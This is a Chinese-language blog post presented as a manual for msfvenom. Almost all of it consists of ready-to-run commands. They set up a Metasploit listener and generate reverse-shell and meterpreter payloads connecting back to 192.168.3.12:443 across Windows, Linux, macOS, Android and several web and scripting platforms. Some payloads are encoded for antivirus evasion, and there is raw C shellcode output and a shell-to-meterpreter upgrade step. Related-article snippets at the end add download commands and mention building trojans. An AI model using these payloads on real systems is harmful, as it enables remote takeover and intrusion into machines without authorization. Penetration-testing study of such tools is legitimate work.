msfvenom手册

最新推荐文章于 2024-03-05 18:16:42 发布
最新推荐文章于 2024-03-05 18:16:42 发布
阅读量178 收藏 1
点赞数 1
分类专栏: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuguojiuai/article/details/115442421
版权

目录

0x01 msfvenom 常规选项

0x02 创建监听器,等待shell回连

 0x03 实例创建各类系统平台下的payload:

windows 平台

powershell

linux 平台

mac 平台,没实际测试

android平台

php 脚本

aspx 脚本

jsp 脚本

war包,找个能部署war包的地方,如各类java控制台,部署一下即可执行

nodejs

python

perl

ruby

lua

0x04 利用wireshark观察不同协议下的payload的细节:

bind类型

reverse类型

32位

64位

0x05 生成不同平台下的shellcode

win平台shellcode

linux平台shellcode

mac平台shellcode

0x06 将普通类型的shell升级为meterpreter:

0x01 msfvenom 常规选项

-l  列出所有可用的payload,编码器,空指令……
-p  指定要使用的msf的payload,也可以使用自定义payload,几乎是支持全平台的
-f  指定payload输出的文件类型,--help-formats,可查看支持的所有输出格式
-e  指定要使用那种编码器
-i  指定编码的次数,如果使用编码器
-b  指定坏字符,比如空字符截断问题,等等……
-x  使用一个自定义可执行程序模板,并将payload嵌入其中
-k  当模板被执行时,payload自动分离并注入到新的进程中,一般和-x选项一并使用
-o  指定创建好的payload的存放位置

0x02 创建监听器,等待shell回连

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set lport 443
msf > set lhost 192.168.3.12
msf > exploit -j

 0x03 实例创建各类系统平台下的payload:

windows 平台

# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o x86_shell.exe

powershell

# msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.3.12 LPORT=443 -e cmd/powershell_base64 -i 3 -f raw -o x86_shell.ps1

linux 平台

# msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -f elf -o x86_shell

mac 平台,没实际测试

# msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.3.12 LPORT=443 -f macho -o x86_shell.macho

android平台

# msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -f apk -o x86_shell.apk

基于各类web脚本,对于此类的web脚本触发执行方法非常简单,直接在url中访问该脚本即可

php 脚本

# msfvenom --platform PHP -p php/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.php

aspx 脚本

# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -f aspx -o x86_shell.aspx

jsp 脚本

# msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.jsp

war包,找个能部署war包的地方,如各类java控制台,部署一下即可执行

# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.war

基于其它各类脚本的payload,说几个实战中可能会碰到的语言环境

nodejs

# msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.js

python

# msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.py

perl

# msfvenom -p cmd/unix/reverse_perl LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.pl

ruby

# msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.rb

lua

# msfvenom -p cmd/unix/reverse_lua LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.lua

0x04 利用wireshark观察不同协议下的payload的细节:

bind类型

windows/meterpreter/bind_tcp
windows/meterpreter/bind_tcp_rc4
windows/meterpreter/bind_hidden_tcp

reverse类型

windows/meterpreter/reverse_tcp
windows/meterpreter/reverse_tcp_dns
windows/meterpreter/reverse_tcp_rc4
windows/meterpreter/reverse_tcp_rc4_dns
windows/meterpreter/reverse_http
windows/meterpreter/reverse_https

32位

windows/meterpreter/bind_tcp

64位

windows/x64/meterpreter/reverse_tcp

0x05 生成不同平台下的shellcode

win平台shellcode

# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -f c

linux平台shellcode

# msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -f c

mac平台shellcode

# msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.3.12 LPORT=443 -f c

0x06 将普通类型的shell升级为meterpreter:

post/multi/manage/shell_to_meterpreter

 

小韩韩啊
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
固件安全测试入门学习手册 (新手必看)
systemino的博客
04-25 4311
无论是公网连接还是独立网络,固件都是控制嵌入式设备的核心。因此,必须要了解如何分析固件以执行未授权的功能。要开始进行安全测试和固件逆向,在即将进行评估时,请使用以下方法作为指导。该方法包括九个阶段,旨在使安全研究人员,软件开发人员和信息安全专业人员能够进行固件安全测试研究。 以下各节将在适用的情况下通过支持示例进一步详细介绍每个阶段。 原文报告如下: https://scriptin...
in.security 提权靶场通关手册上篇
weixin_47767605的博客
05-17 1552
0x00 in.security靶场介绍 大家好,本期丹丹妹,给大家带来一个Linux 配置问题导致提权的靶场通关手册,也就是lin.security靶场。 lin.security靶场是一个基于Ubuntu(18.04 LTS)的Linux虚拟机,靶场提供许多权限提升的漏洞供我们练习关于linux权限的相关知识,下面是这个靶场的下载链接: https://in.security/downloads/lin.security_v1.0.ova。 这个是一个vmware的ova文件...
《Metasploit渗透测试手册》—第8章8.4节使用msfvenom
weixin_33948416的博客
05-02 114
本节书摘来自异步社区《Metasploit渗透测试手册》一书中的第8章8.4节使用msfvenom,作者【印度】Abhinav Singh,更多章节内容可以访问云栖社区“异步社区”公众号查看。 8.4 使用msfvenomMetasploit渗透测试手册在第4章中,我们曾提及过msfencode和msfpayload。现在简单回顾一下,msfpayloa...
msfvenom常用参数
m0_61506558的博客
08-29 1581
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
Msfvenom
LIVE
04-04 1519
windows: c:\metasploit>msfvenom.bat -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.199 LPORT=3080 -e x86/shikata_ga_nai -i 3 -f exe > c:\2.exe c:\metasploit>m...
远控免杀学习笔记-msfvenom自带免杀
m0_49025459的博客
04-10 700
生成的payload.exe在/home/kali/.msf4/local/目录下,然后扔沙箱里看一下。
内网渗透一条龙简洁版
qq_40708881的博客
12-12 373
内网渗透一条龙简洁版 反弹shell 工具准备 搭建http服务 python快速在当前目录搭建http服务 python -m SimpleHTTPServer 8000 Linux下载命令: wget http://fuck/nc Linux解压缩命令: #解压 tar -zxvf FileName.tar.gz #压缩 tar -zcvf FileName.tar.gz DirName Window下载命令 certutil -urlcache -split -f http://fuck/nc.
cli-call-collection:带有可用参数的渗透测试cli调用的集合
04-04
手册页上花费更少的时间;) 例子 您可以通过qccc脚本grep呼叫集合。 例如: qccc msfvenom # Found 6 results: # msfvenom generate java tcp reverse shell with file format war for tomcat deployment ...
第一章 魔鬼训练营--初识Metasploit
qq_31411551的博客
05-11 449
第一章 魔鬼训练营–初识Metasploit 课程 渗透测试就是一种通过模拟恶意攻击者的技术与方法,挫败目标系统安全控制措施,取得访问控制权,并发现具备业务影响后果安全隐患的一种安全测试与评估方法。一般分为黑盒测试 和 白盒测试 ,两种结合是灰盒测试。 白盒测试的最大问题在于无法有效地测试客户组织的应急响应程序,也无法判断他们的安全防护计划对检测特定攻击的频率。 渗透测试方法体系标准: 安全测试方法学开源手册(OSSTMM),NIST SP 800-42 网络安全测试指南,OWASP十大Web应用安全
kali-msfvenom生成远控木马
Ryongao
01-16 897
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
Msfconsole详细教程
最新发布
weixin_65582330的博客
03-05 3572
Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。选择架构平台:x86 | x64 | x86_64Platforms:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe。
Msfvenom使用指南
m0_57221101的博客
02-08 6148
参数总结 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f (- -help-formats) 输出文件格式。 (- -help-form
msfvenom 基本使用
blackguest07的博客
03-05 1562
msfvenom 基础命令
metasploit中msfvenom命令解释说明
WEL测试
08-29 6540
我使用的版本如下图所示:v4.16.0-dev- 在这个版中,之前的msfpayload、msfencode命令被整合到msfvenom中。 在命令行执行命令:msfvenom -h可以查看msfvenom解释说明: 针对上面的信息进行解释如下: MsfVenom:是Metasploit的独立负荷(payload)生成器。同时也替代了命令msfpayload、msfenco
metasploit---msfvenom
孤的博客
11-21 1531
在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenommsfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以...
演示使用Metasploit入侵Windows
weixin_34001430的博客
04-25 950
我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。 本文演示怎么使用Metasploit入侵windows xp sp3。 启动msfconsole: # msfconsole 选择一个漏洞: msf > search platform: windows xp sp3 ...
MSFvenom基础
子曰小玖的博客
05-16 1895
https://www.offensive-security.com/metasploit-unleashed/msfvenom/ https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom kali自带的生成木马工具----Msfvenom Msfvenom是有效负载生成和编码的组合。它于2015年6月8日...
Msfvenom介绍及利用
热门推荐
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
msfvenom 检测
10-04
msfvenom是Metasploit框架中的一个工具,用于生成各种类型的恶意软件。由于其具有强大的功能和广泛的应用,攻击者可能会使用msfvenom来制作恶意软件,以进行网络攻击和渗透测试。 要检测msfvenom,我们可以采取以下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值